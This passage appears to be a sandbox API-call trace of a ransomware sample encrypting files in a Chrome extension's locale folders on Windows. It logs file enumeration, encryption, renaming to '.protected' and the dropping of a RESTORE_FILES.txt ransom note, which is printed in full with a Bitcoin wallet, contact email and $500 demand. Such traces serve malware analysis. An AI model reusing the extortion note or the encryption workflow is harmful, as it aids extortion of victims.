(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.625] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.626] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.626] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.626] CloseHandle (hObject=0x164) returned 1 [0079.626] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0079.626] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi") returned 142 [0079.626] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0079.626] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0079.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*") returned 144 [0079.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.626] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.626] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.626] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.626] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.626] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\.") returned 144 [0079.626] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.626] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.626] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.626] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.626] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.626] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.626] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\..") returned 145 [0079.626] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.626] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.626] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.626] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.627] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.627] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.627] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.627] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.627] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0079.628] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.628] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x117, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0079.628] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.628] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.628] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.628] CloseHandle (hObject=0x168) returned 1 [0079.628] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.protected") returned 166 [0079.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.protected")) returned 1 [0079.629] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.629] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.629] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\RESTORE_FILES.txt") returned 160 [0079.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.629] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.629] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.630] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.630] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.630] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.630] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.630] CloseHandle (hObject=0x164) returned 1 [0079.630] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0079.630] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN") returned 145 [0079.630] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0079.630] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*") returned 147 [0079.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.631] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.631] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.631] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.631] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.631] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\.") returned 147 [0079.631] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.631] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.631] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.631] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.631] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.631] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.631] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\..") returned 148 [0079.631] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.631] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.631] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.631] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.631] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.631] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.631] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.632] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.632] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.632] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.632] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.632] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.632] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.632] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x111, lpOverlapped=0x0) returned 1 [0079.633] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.633] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x111, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x111, lpOverlapped=0x0) returned 1 [0079.633] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.633] CloseHandle (hObject=0x168) returned 1 [0079.634] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.protected") returned 169 [0079.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0079.634] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.634] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 163 [0079.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.635] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.635] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.636] lstrlenA 